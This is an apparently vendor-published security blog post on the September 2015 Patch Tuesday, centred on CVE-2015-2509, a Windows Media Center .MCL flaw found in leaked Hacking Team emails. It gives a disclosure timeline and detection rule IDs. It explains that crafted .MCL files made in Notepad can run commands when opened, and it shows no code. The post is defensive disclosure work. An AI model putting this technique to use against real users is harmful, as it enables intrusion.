Windows Media Center Hacking Team Bug Fixed in September 2015 Patch Tuesday
This month’s Patch Tuesday features 12 updates, with five rated as “critical” and seven as “important.” Included in the critical updates are cumulative updates for both Internet Explorer (MS15-094) and Microsoft Edge (MS15-95). These updates address bugs that could allow remote code execution if the user visits a specially crafted webpage using either browser.
Adobe has also released a security update (APSB15-22), which addresses vulnerabilities for Adobe Shockwave Player. According to the bulletin, the updates “address critical vulnerabilities that could potentially allow an attacker to take control of the affected system.”
Looking into CVE-2015-2509
One of the critical updates addresses a vulnerability found in the Windows Media Center (CVE-2015-2509). This vulnerability is related to a previously unreported zero-day exploit discovered in the Hacking Team leaked emails. Trend Micro researchers discovered the exploit and subsequently reported their findings to Microsoft.
Based on information in the emails, the exploit works perfectly with the latest version of Windows Media Center.
Figure 1. Leaked Hacking Team email
More details can be found in the screenshot of an email below. The crafted Windows Media Center file can be sent in different ways, including email, websites, and instant messaging services. Once the file is opened by the user, no further interaction is required.
Figure 2. Details about the exploit
It should be noted that the Windows Media Center file extension is .MCL. We found that it is easy to create .MCL files using Notepad. For example, we created a .MCL file that contained instructions that will launch the computer’s calculator.
Figure 3. Sample .MCL file
We have successfully reproduced and sent the related POC file to Microsoft, which they have addressed in this month’s Patch Tuesday.
The leaked data has been made available for over a month now, following the Hacking Team leaks, and cybercriminals may use this exploit for future attacks. We recommend users avoid opening any files with the .MCL file extension, especially from unverified sources.
Users are strongly advised to update their software and systems with these latest patches from Microsoft and Adobe. For additional information on these security bulletins, visit our Threat Encyclopedia page.
Trend Micro solutions
Trend Micro Deep Security and Vulnerability Protection protect user systems from threats that may leverage these vulnerabilities with the following DPI rules:
- 1007029 – Microsoft Windows Journal Remote Code Execution Vulnerability (CVE-2015-2513)
- 1007025 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2486)
- 1007024 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2485)
- 1007030 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2491)
- 1007026 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2487)
- 1007041 – Microsoft Internet Explorer Information Disclosure Vulnerability (CVE-2015-2483)
- 1007050 – Microsoft Office Memory Corruption Vulnerability (CVE-2015-2521)
- 1007051 – Microsoft Office Memory Corruption Vulnerability (CVE-2015-2523)
- 1007049 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2501)
- 1007039 – Microsoft Graphics Component Buffer Overflow Vulnerability (CVE-2015-2510)
- 1007043 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2492)
- 1007046 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2499)
- 1007044 – Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability (CVE-2015-2493)
- 1007048 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2500)
- 1007047 – Windows Media Center Remote Code Execution Vulnerability (CVE-2015-2509)
- 1007045 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2498)
- 1007028 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2015-2490)
- 1007040 – Microsoft Office Memory Corruption Vulnerability (CVE-2015-2520)
- 1007052 – Microsoft Windows OpenType Font Parsing Vulnerability (CVE-2015-2506)
The vulnerability CVE-2015-2509 was disclosed to Microsoft, with details outlined below:
- July 18 – We first sent the initial notification to Microsoft.
- August 8 – Microsoft acknowledged the vulnerability.
- September 8 – The security patch for this vulnerability was released.